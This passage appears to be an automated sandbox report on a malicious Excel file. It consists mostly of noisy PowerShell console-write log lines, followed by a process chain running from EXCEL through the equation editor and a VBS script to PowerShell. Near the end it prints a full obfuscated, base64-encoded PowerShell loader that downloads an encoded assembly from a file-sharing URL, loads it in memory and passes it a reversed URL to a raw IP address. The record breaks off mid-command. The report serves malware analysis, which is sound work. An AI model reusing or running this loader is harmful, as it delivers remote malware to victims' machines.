        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........l......................u.e.s.t.........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m......................u.e.s.t.........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m......................u.e.s.t.........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m......................u.e.s.t.................T.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......:m......................u.e.s.t.........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h.......Lm......................u.e.s.t.........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Xm......................u.e.s.t.........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......vm.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................P.a.r.a.m.e.t.e.r. .n.a.m.e.:. .b.y.t.e.s."........................s....................,.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.6.2......m.........................s....................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........m.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......*n.........................s....................f.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......6n.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h.......Hn.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Tn.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......rn.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.8.7......n.........................s....................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........n.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s....................`.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h.......(o.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......4o.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Ro.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......^o.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.2.....ro.........................s....................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......~o.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s....................`.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........o.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................F.a.l.s.e.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................l.s.(.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......;p.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Gp.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.9.5.....Yp.........................s....................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......ep.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......wp.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s....................`.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........p.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........q.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......$q.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.6.1.....6q.........................s....................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Bq.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Tq.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......`q.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......rq.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......~q.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........q.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........q.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........q.........................s....................`.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........q.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h........q.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........q.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......)r.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......;r.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Gr.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Yr.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......er.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......wr.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.3.8......r.........................s....................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........r.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s.........................s....................j.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h.......+s.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......7s.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................U.n.a.b.l.e. .t.o. .f.i.n.d. .t.y.p.e. .[.d.n.l.i.b...I.O...H.o.m.e.]...................H.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......xs......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.1.9......s......................m.e.]...................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s......................m.e.]...........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s......................m.e.]...........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........s......................m.e.]...........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .u.n.t.i.m.e.E.x.c.e.p.t.i.o.n......t......................m.e.]...................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h....... t......................m.e.]...................T.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......,t......................m.e.]...........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h.......>t......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......Jt......................m.e.]...........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......gt.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......st.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.5.2......t.........................s....................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........t.........................s....................`.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........u.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\.......h........u.........................s............................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......'u.........................s............................(...............Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: fUHl7rElXU.xlsxReversingLabs: Detection: 71%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, 